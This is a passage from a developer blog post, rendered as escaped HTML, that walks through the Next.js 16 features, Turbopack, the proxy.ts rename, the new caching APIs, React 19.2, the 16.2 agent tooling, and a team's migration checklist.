        &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;LivePrice&lt;/span&gt; &lt;span class="nx"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;42&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="o"&gt;/&amp;gt;&lt;/span&gt;
      &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="sr"&gt;/Suspense&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;
&lt;/span&gt;    &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="sr"&gt;/&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;
&lt;/span&gt;  &lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As a bonus, when &lt;code&gt;cacheComponents&lt;/code&gt; is on, client navigation preserves the previous route's state via React's &lt;code&gt;&amp;lt;Activity&amp;gt;&lt;/code&gt;. Leaving a route sets it to "hidden" rather than unmounting, so going back restores scroll and input state. Effects are cleaned up when hidden and recreated when visible again.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Turbopack stable — default bundler + filesystem caching
&lt;/h2&gt;

&lt;p&gt;Turbopack, the Rust-based bundler replacing Webpack, is &lt;strong&gt;stable&lt;/strong&gt; in 16 for both dev and production builds and is now the default for new projects. During the beta, 50%+ of dev sessions and 20%+ of production builds on Next.js 15.3+ were already on Turbopack.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Improvement&lt;/th&gt;
&lt;th&gt;Note&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Production builds&lt;/td&gt;
&lt;td&gt;2–5× faster&lt;/td&gt;
&lt;td&gt;Zero-config default&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Fast Refresh&lt;/td&gt;
&lt;td&gt;up to 10× faster&lt;/td&gt;
&lt;td&gt;Most noticeable on large apps&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dev startup (16.2)&lt;/td&gt;
&lt;td&gt;~87% faster vs 16.1&lt;/td&gt;
&lt;td&gt;Default app&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If you have a custom Webpack setup, a flag keeps Webpack alive. For large monorepos, the beta filesystem caching persists compiler artifacts to disk across restarts for extra speed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Keep Webpack during the migration window&lt;/span&gt;
next dev &lt;span class="nt"&gt;--webpack&lt;/span&gt;
next build &lt;span class="nt"&gt;--webpack&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// next.config.ts — dev filesystem caching (beta) for large apps&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="na"&gt;experimental&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;turbopackFileSystemCacheForDev&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  4. proxy.ts — the end of middleware.ts and a clearer network boundary
&lt;/h2&gt;

&lt;p&gt;16 renames &lt;code&gt;middleware.ts&lt;/code&gt; to &lt;strong&gt;&lt;code&gt;proxy.ts&lt;/code&gt;&lt;/strong&gt;. The API and matcher are identical; just rename the exported function to &lt;code&gt;proxy&lt;/code&gt;. The reason is identity — this file is a &lt;em&gt;request-time proxy intercepting requests in front of the cache&lt;/em&gt;, not just "auth middleware," and it runs on a single Node.js runtime. &lt;code&gt;middleware.ts&lt;/code&gt; remains for Edge runtime use cases for now but is deprecated and slated for removal.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// proxy.ts (formerly middleware.ts) — runs on the Node.js runtime&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;NextRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;NextResponse&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;next/server&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;proxy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;request&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;NextRequest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;NextResponse&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;redirect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;URL&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;/home&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Migration is trivial: move &lt;code&gt;middleware.ts&lt;/code&gt; → &lt;code&gt;proxy.ts&lt;/code&gt;, rename the export to &lt;code&gt;proxy&lt;/code&gt;, and the logic stays the same.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Improved caching APIs — revalidateTag, updateTag, refresh
&lt;/h2&gt;

&lt;p&gt;To match the Cache Components model, cache invalidation is organized into three APIs. The point is to clearly pick &lt;strong&gt;"SWR, read-your-writes, or refresh-uncached-data"&lt;/strong&gt; based on intent.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;API&lt;/th&gt;
&lt;th&gt;Use&lt;/th&gt;
&lt;th&gt;Semantics&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;revalidateTag(tag, profile)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Invalidate tagged cache&lt;/td&gt;
&lt;td&gt;SWR — serve stale immediately, revalidate in background&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;updateTag(tag)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Server Actions only&lt;/td&gt;
&lt;td&gt;read-your-writes — fresh data within the same request&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;refresh()&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Server Actions only&lt;/td&gt;
&lt;td&gt;refresh uncached data only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The biggest change: &lt;code&gt;revalidateTag&lt;/code&gt; now &lt;strong&gt;requires a &lt;code&gt;cacheLife&lt;/code&gt; profile as the second argument&lt;/strong&gt; (the single-argument form is deprecated). &lt;code&gt;'max'&lt;/code&gt; is recommended for most long-lived content.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;revalidateTag&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;next/cache&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;// ✅ Built-in profile ('max' recommended — background revalidation)&lt;/span&gt;
&lt;span class="nf"&gt;revalidateTag&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;blog-posts&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;max&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nf"&gt;revalidateTag&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;news-feed&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;hours&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Inline object for custom expiry&lt;/span&gt;
&lt;span class="nf"&gt;revalidateTag&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;products&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;expire&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;3600&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="c1"&gt;// ⚠️ Note: single-argument form is deprecated&lt;/span&gt;
&lt;span class="c1"&gt;// revalidateTag('blog-posts');&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For "the user must see their own change instantly" cases — form/settings saves — use &lt;code&gt;updateTag&lt;/code&gt; inside a Server Action. To refresh only uncached dynamic values like a notification count, use &lt;code&gt;refresh&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;use server&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;updateTag&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;next/cache&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;updateUserProfile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;userId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;profile&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;Profile&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;db&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;users&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;userId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;profile&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="c1"&gt;// Expire + re-read immediately → user sees the change right away&lt;/span&gt;
  &lt;span class="nf"&gt;updateTag&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;`user-&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;userId&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  6. React 19.2 + React Compiler — View Transitions, Activity, automatic memoization
&lt;/h2&gt;

&lt;p&gt;16's App Router runs on the latest React Canary and includes React 19.2 features. Three you'll feel in production:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;View Transitions&lt;/strong&gt; animate elements that update inside a Transition or navigation. &lt;strong&gt;useEffectEvent&lt;/strong&gt; extracts non-reactive logic out of Effects, easing dependency-array pain. &lt;strong&gt;Activity&lt;/strong&gt; hides UI with &lt;code&gt;display:none&lt;/code&gt; while preserving state and cleaning up Effects — the basis for the route-state preservation above.&lt;/p&gt;

&lt;p&gt;On top of that, &lt;strong&gt;React Compiler 1.0&lt;/strong&gt; support is stable. Automatic memoization reduces unnecessary re-renders, sparing manual &lt;code&gt;useMemo&lt;/code&gt;/&lt;code&gt;useCallback&lt;/code&gt;, but it's not on by default (Babel dependency can lengthen builds, and data is still being gathered). Opt in:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// next.config.ts&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="na"&gt;reactCompiler&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// stable but off by default — opt-in&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npm &lt;span class="nb"&gt;install &lt;/span&gt;babel-plugin-react-compiler@latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  7. Routing &amp;amp; navigation overhaul — layout dedup + incremental prefetch
&lt;/h2&gt;

&lt;p&gt;16 fully rewrote routing/navigation. Two axes apply with no code changes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layout deduplication&lt;/strong&gt;: when prefetching multiple URLs sharing a layout, the layout downloads once instead of per link. A page with 50 product links downloads the shared layout once, not 50 times, slashing transfer size.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Incremental prefetching&lt;/strong&gt;: only the parts not already cached are prefetched, not whole pages. The prefetch cache cancels requests when a link leaves the viewport, prioritizes on hover/re-entry, and re-prefetches when data is invalidated. You may see more individual requests but far lower total transfer — the right trade-off for nearly all apps.&lt;/p&gt;

&lt;h2&gt;
  
  
  8. 16.1 &amp;amp; 16.2 — toward an AI-native framework
&lt;/h2&gt;

&lt;p&gt;16.1 refined Cache Components and polished caching APIs and DX. Then &lt;strong&gt;16.2&lt;/strong&gt; (March 18, 2026) made the direction explicit — &lt;em&gt;"make the framework itself easy for AI coding agents to operate."&lt;/em&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;16.2 feature&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Effect&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AGENTS.md by default&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;create-next-app&lt;/code&gt; ships version-matched docs to agents&lt;/td&gt;
&lt;td&gt;100% internal eval pass (vs 79% skill-based)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Browser log forwarding&lt;/td&gt;
&lt;td&gt;Client errors forwarded to the dev terminal by default&lt;/td&gt;
&lt;td&gt;See client errors without switching to the console&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent DevTools (experimental)&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;next-browser&lt;/code&gt; CLI exposes screenshots, network, console, component tree&lt;/td&gt;
&lt;td&gt;LLM parses CLI output instead of a panel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Performance&lt;/td&gt;
&lt;td&gt;~87% faster dev startup vs 16.1&lt;/td&gt;
&lt;td&gt;Default app&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Browser log forwarding level is configurable:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// next.config.ts&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="na"&gt;logging&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// 'error' (default) | 'warn' | 'verbose' | false&lt;/span&gt;
    &lt;span class="na"&gt;browserToTerminal&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;warn&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The key insight: an LLM can't "read" a DevTools panel, but it can parse the text output of &lt;code&gt;next-browser tree&lt;/code&gt;. Each command is a one-shot request against a persistent browser session, so agents can query the app repeatedly without managing browser state — which dovetails neatly with our CLAUDE.md token-optimization principles (structured input, result caching).&lt;/p&gt;

&lt;h2&gt;
  
  
  9. Migration decisions — breaking changes and flow
&lt;/h2&gt;

&lt;p&gt;As a major release, 16 carries non-trivial compatibility changes. The most important:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Area&lt;/th&gt;
&lt;th&gt;Change&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Runtime&lt;/td&gt;
&lt;td&gt;Node.js 20.9+ / TypeScript 5.1+ required&lt;/td&gt;
&lt;td&gt;Node 18 dropped — upgrade runtime first&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bundler&lt;/td&gt;
&lt;td&gt;Turbopack default&lt;/td&gt;
&lt;td&gt;Custom Webpack opts out via &lt;code&gt;--webpack&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Middleware&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;middleware.ts&lt;/code&gt; deprecated&lt;/td&gt;
&lt;td&gt;Rename to &lt;code&gt;proxy.ts&lt;/code&gt; + function name &lt;code&gt;proxy&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cache&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;revalidateTag&lt;/code&gt; signature change&lt;/td&gt;
&lt;td&gt;Add second arg: a &lt;code&gt;cacheLife&lt;/code&gt; profile&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lint&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;next lint&lt;/code&gt; removed&lt;/td&gt;
&lt;td&gt;Use Biome/ESLint directly — codemod provided&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Images&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;images.qualities&lt;/code&gt; default &lt;code&gt;[75]&lt;/code&gt;, &lt;code&gt;minimumCacheTTL&lt;/code&gt; 4 hours&lt;/td&gt;
&lt;td&gt;Re-verify quality/cache policy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Parallel routes&lt;/td&gt;
&lt;td&gt;every slot requires &lt;code&gt;default.js&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Build fails without it — add &lt;code&gt;notFound()&lt;/code&gt;/&lt;code&gt;null&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AMP&lt;/td&gt;
&lt;td&gt;removed entirely&lt;/td&gt;
&lt;td&gt;All AMP APIs (&lt;code&gt;useAmp&lt;/code&gt;, etc.) deleted&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Below is the upgrade decision flow our team uses.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;flowchart TD
    A[Next.js 15 service] --&amp;gt; B{Node 20.9+/TS 5.1+?}
    B --&amp;gt;|No| C[Upgrade runtime first]
    C --&amp;gt; B
    B --&amp;gt;|Yes| D[codemod: npx @next/codemod upgrade latest]
    D --&amp;gt; E{Custom Webpack config?}
    E --&amp;gt;|Yes| F[Interim: keep --webpack + verify Turbopack gradually]
    E --&amp;gt;|No| G[Adopt Turbopack default]
    F --&amp;gt; H[Rename middleware.ts -&amp;gt; proxy.ts]
    G --&amp;gt; H
    H --&amp;gt; I[Add cacheLife profile to revalidateTag]
    I --&amp;gt; J{Redesign caching?}
    J --&amp;gt;|Yes| K[cacheComponents: true + adopt use cache gradually]
    J --&amp;gt;|No| L[Keep default dynamic model]
    K --&amp;gt; M[staging build/perf regression test]
    L --&amp;gt; M
    M --&amp;gt; N{Zero regressions?}
    N --&amp;gt;|No| O[Root-cause and fix]
    O --&amp;gt; M
    N --&amp;gt;|Yes| P[Gradual prod rollout + monitoring]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  10. ManoIT internal adoption checklist
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Task&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done criteria&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Runtime audit — find Node 18 services, upgrade to 20.9+&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;All services Node 20.9+/TS 5.1+&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Apply codemod on dev branch, confirm build passes&lt;/td&gt;
&lt;td&gt;Frontend&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;next build&lt;/code&gt; succeeds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Bulk-rename &lt;code&gt;middleware.ts&lt;/code&gt; → &lt;code&gt;proxy.ts&lt;/code&gt; PR&lt;/td&gt;
&lt;td&gt;Frontend&lt;/td&gt;
&lt;td&gt;auth/redirect e2e passes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Add &lt;code&gt;cacheLife&lt;/code&gt; profiles to &lt;code&gt;revalidateTag&lt;/code&gt; callsites&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;Zero deprecation warnings&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Check parallel-route slots for missing &lt;code&gt;default.js&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Frontend&lt;/td&gt;
&lt;td&gt;Zero build errors&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Review image policy — &lt;code&gt;qualities&lt;/code&gt;/&lt;code&gt;minimumCacheTTL&lt;/code&gt; regressions&lt;/td&gt;
&lt;td&gt;Frontend&lt;/td&gt;
&lt;td&gt;Zero visual regressions on key screens&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Baseline Turbopack build time &amp;amp; bundle size&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Before/after build-time report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Caching-redesign PoC — &lt;code&gt;cacheComponents&lt;/code&gt; + &lt;code&gt;use cache&lt;/code&gt; on key pages&lt;/td&gt;
&lt;td&gt;Frontend lead&lt;/td&gt;
&lt;td&gt;TTFB / cache hit-rate measured&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;React Compiler opt-in A/B — build time vs runtime re-renders&lt;/td&gt;
&lt;td&gt;Frontend&lt;/td&gt;
&lt;td&gt;Adoption decision doc&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Standardize 16.2 AGENTS.md + browser log forwarding&lt;/td&gt;
&lt;td&gt;DX&lt;/td&gt;
&lt;td&gt;Reflected in new-repo template&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;staging load/perf regression test (Lighthouse, k6)&lt;/td&gt;
&lt;td&gt;QA&lt;/td&gt;
&lt;td&gt;Zero Core Web Vitals regression&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Gradual prod rollout (canary → all) + rollback rehearsal&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Zero-downtime deploy + rollback verified&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  11. Conclusion — a major release that delivers "predictable caching and fast defaults"
&lt;/h2&gt;

